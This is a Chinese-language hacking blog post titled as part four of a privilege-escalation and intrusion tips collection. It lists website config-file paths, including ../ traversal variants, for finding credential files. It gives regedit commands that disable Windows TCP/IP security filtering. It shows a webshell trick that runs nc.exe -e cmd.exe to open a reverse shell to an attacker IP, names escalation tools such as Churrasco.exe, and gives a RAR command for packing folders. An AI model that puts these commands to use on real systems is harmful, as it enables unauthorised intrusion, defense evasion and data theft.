提權、***、經驗、技巧總結大全四

原創 gaodi2002 2018-09-10 04:31

各種網站的配置文件相對路徑大全:

/config.php
http://www.cnblogs.com/config.php
../config.php
http://www.cnblogs.com/../config.php
/config.inc.php
./config.inc.php
http://www.cnblogs.com/config.inc.php
../config.inc.php
http://www.cnblogs.com/../config.inc.php
/conn.php
./conn.php
http://www.cnblogs.com/conn.php
../conn.php
http://www.cnblogs.com/../conn.php
/conn.asp
./conn.asp
http://www.cnblogs.com/conn.asp
../conn.asp
http://www.cnblogs.com/../conn.asp
/config.inc.php
./config.inc.php
http://www.cnblogs.com/config.inc.php
../config.inc.php
http://www.cnblogs.com/../config.inc.php
/config/config.php
http://www.cnblogs.com/config/config.php
../config/config.php
http://www.cnblogs.com/../config/config.php
/config/config.inc.php
./config/config.inc.php
http://www.cnblogs.com/config/config.inc.php
../config/config.inc.php
http://www.cnblogs.com/../config/config.inc.php
/config/conn.php
./config/conn.php
http://www.cnblogs.com/config/conn.php
../config/conn.php
http://www.cnblogs.com/../config/conn.php
/config/conn.asp
./config/conn.asp
http://www.cnblogs.com/config/conn.asp
../config/conn.asp
http://www.cnblogs.com/../config/conn.asp
/config/config.inc.php
./config/config.inc.php
http://www.cnblogs.com/config/config.inc.php
../config/config.inc.php
http://www.cnblogs.com/../config/config.inc.php
/data/config.php
http://www.cnblogs.com/data/config.php
../data/config.php
http://www.cnblogs.com/../data/config.php
/data/config.inc.php
./data/config.inc.php
http://www.cnblogs.com/data/config.inc.php
../data/config.inc.php
http://www.cnblogs.com/../data/config.inc.php
/data/conn.php
./data/conn.php
http://www.cnblogs.com/data/conn.php
../data/conn.php
http://www.cnblogs.com/../data/conn.php
/data/conn.asp
./data/conn.asp
http://www.cnblogs.com/data/conn.asp
../data/conn.asp
http://www.cnblogs.com/../data/conn.asp
/data/config.inc.php
./data/config.inc.php
http://www.cnblogs.com/data/config.inc.php
../data/config.inc.php
http://www.cnblogs.com/../data/config.inc.php
/include/config.php
http://www.cnblogs.com/include/config.php
../include/config.php
http://www.cnblogs.com/../include/config.php
/include/config.inc.php
./include/config.inc.php
http://www.cnblogs.com/include/config.inc.php
../include/config.inc.php
http://www.cnblogs.com/../include/config.inc.php
/include/conn.php
./include/conn.php
http://www.cnblogs.com/include/conn.php
../include/conn.php
http://www.cnblogs.com/../include/conn.php
/include/conn.asp
./include/conn.asp
http://www.cnblogs.com/include/conn.asp
../include/conn.asp
http://www.cnblogs.com/../include/conn.asp
/include/config.inc.php
./include/config.inc.php
http://www.cnblogs.com/include/config.inc.php
../include/config.inc.php
http://www.cnblogs.com/../include/config.inc.php
/inc/config.php
http://www.cnblogs.com/inc/config.php
../inc/config.php
http://www.cnblogs.com/../inc/config.php
/inc/config.inc.php
./inc/config.inc.php
http://www.cnblogs.com/inc/config.inc.php
../inc/config.inc.php
http://www.cnblogs.com/../inc/config.inc.php
/inc/conn.php
./inc/conn.php
http://www.cnblogs.com/inc/conn.php
../inc/conn.php
http://www.cnblogs.com/../inc/conn.php
/inc/conn.asp
./inc/conn.asp
http://www.cnblogs.com/inc/conn.asp
../inc/conn.asp
http://www.cnblogs.com/../inc/conn.asp
/inc/config.inc.php
./inc/config.inc.php
http://www.cnblogs.com/inc/config.inc.php
../inc/config.inc.php
http://www.cnblogs.com/../inc/config.inc.php
/index.php
./index.php
http://www.cnblogs.com/index.php
../index.php
http://www.cnblogs.com/../index.php
/index.asp
./index.asp
http://www.cnblogs.com/index.asp
../index.asp
http://www.cnblogs.com/../index.asp
 
去除TCP IP篩選:

TCP/IP篩選在註冊表裏有三處,分別是:

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

分別用以下命令來導出註冊表項:
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
regedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip

然後再把三個文件裏的:

“EnableSecurityFilters"=dword:00000001”

改爲:

“EnableSecurityFilters"=dword:00000000”

再將以上三個文件分別用以下命令導入註冊表即可:
regedit -s D:\a.reg
regedit -s D:\b.reg
regedit -s D:\c.reg
 
Webshell 提權小技巧:

Cmd路徑:c:\windows\temp\cmd.exe

Nc 也在同目錄下,例如反彈cmdshell:

"c:\windows\temp\nc.exe -vv ip 999 -e c:\windows\temp\cmd.exe"

通常都不會成功。

而直接在 cmd 路徑上輸入:c:\windows\temp\nc.exe

命令輸入:-vv ip 999 -e c:\windows\temp\cmd.exe

卻能成功。。這個不是重點
我們通常執行 pr.exe 或 Churrasco.exe 的時候也需要按照上面的方法才能成功。
 
命令行調用 RAR 打包:

rar a -k -r -s -m3 c:\1.rar c:\folder
 


發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章

tomcat限制用域名訪問 禁止 ip訪問

張斌66 2019-02-23 13:44:28

新e時代網站

lichenjing9 2019-02-23 14:06:52

web網站服務2

曉晶 2019-02-23 13:58:27

虛擬機的使用和Linux的一些基礎

夢與時光眠 2019-02-23 13:51:55

科技部網站是這樣回答無聊問題的....

張富貴 2019-02-23 13:49:41

brew安裝步驟

guoshuang_123 2019-02-23 13:43:55

MySQL性能優化的21個最佳實踐

fdb2b 2019-02-23 14:01:03

如何將 .nk2 文件導入至 Outlook 2010

lingping 2019-02-23 14:05:54

yum源配置

Knight4NUI 2019-02-23 14:02:46

ubuntu下更改ip地址

lzwing 2019-02-23 13:57:24

MySQL的主主同步

夢與時光眠 2019-02-23 13:51:55

CentOS ifcfg-ethX 常用參數

zinejo 2019-02-23 13:50:36

Centos6.5 rsync同步備份

張斌66 2019-02-23 13:44:28

XP登錄時提示“無法加載配置文件,找不到指定文件”

781732825 2019-02-23 13:43:04

centos上重要的一些配置文件(持續更新)

jijianzheng321 2019-02-23 13:42:18